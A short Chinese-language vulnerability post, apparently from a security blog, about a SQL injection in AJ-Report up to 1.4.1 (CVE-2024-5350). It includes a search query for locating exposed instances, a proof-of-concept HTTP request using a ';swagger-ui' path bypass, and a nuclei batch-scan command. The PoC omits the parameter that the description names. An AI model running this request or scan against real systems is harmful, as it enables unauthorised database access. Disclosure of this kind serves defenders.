一:漏洞名称
AJ-Report pageList sql注入漏洞
二:漏洞描述
AJ-Report 1.4.1 是一个灵活的开源工具,可轻松生成各种动态报表,并支持多种数据源。它易于集成到 Java Web 应用程序中,提供了丰富的定制选项,适用于开发人员快速创建和展示报表。
AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。
三:漏洞影响版本
AJ-Report up to 1.4.1
四:网络空间测绘查询
title="AJ-Report"
五:漏洞复现
poc
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
SQL注入(SQL Injection)是一种常见的安全漏洞,它允许攻击者利用应用程序中存在的漏洞,向数据库中执行恶意的SQL查询。其原理主要涉及到应用程序对用户输入的处理不当,使得恶意用户可以在输入中插入SQL代码,从而实现对数据库的非法操作。
六:批量检测
nuclei.exe -t CVE-2024-5350.yaml -l host.txt
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
22c170167d20240605032318.zip
zip文件
2.3K
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容